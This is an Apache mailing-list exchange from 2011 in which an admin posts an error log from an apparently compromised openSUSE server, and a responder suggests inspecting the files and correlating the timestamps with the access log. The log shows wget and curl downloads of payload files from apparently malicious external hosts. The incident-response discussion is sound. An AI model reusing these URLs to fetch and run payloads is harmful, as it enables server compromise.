On 2011-10-28 21:46, Gary Smith wrote:
I was tasked on tracking down the cause of a perl process that is hanging on a
client server. The server is opensuse, pretty much out of the box, patched
pretty current. Anyway, below is the first log entry where it looks like
someone attempted to run a perl script. It also appears that a file was
somehow saved. Since I see that there is a url in it, I figured I'd ask others
if they have seen this attack vector recently and what resolution path I might
take.
[Wed Sep 21 12:30:09 2011] [notice] Apache/2.2.15 (Linux/SUSE) mod_ssl/2.2.15
OpenSSL/1.0.0 PHP/5.3.3 configured -- resuming normal operations
perl: no process found
--2011-09-22 12:58:42-- http://joytalk.byethost4.com/uau
Resolving joytalk.byethost4.com... 209.190.24.4
Connecting to joytalk.byethost4.com|209.190.24.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `uau'
0K .......... .......... ......... 185K=0.2s
2011-09-22 12:58:43 (185 KB/s) - `uau' saved [29702]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 29702 0 29702 0 0 73064 0 --:--:-- --:--:-- --:--:-- 91390
--2011-10-03 12:32:31-- http://91.205.74.14/.xal/.ICE-un1x
Connecting to 91.205.74.14:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29710 (29K) [text/plain]
Saving to: `.ICE-un1x'
0K .......... .......... ......... 100% 54.4K=0.5s
2011-10-03 12:32:31 (54.4 KB/s) - `.ICE-un1x' saved [29710/29710]
So go and see what is in those files.
Since they were kind enough to timestamp the download, you can correlate
this with the access log and see the exact exploit used.
--
J.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
" from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org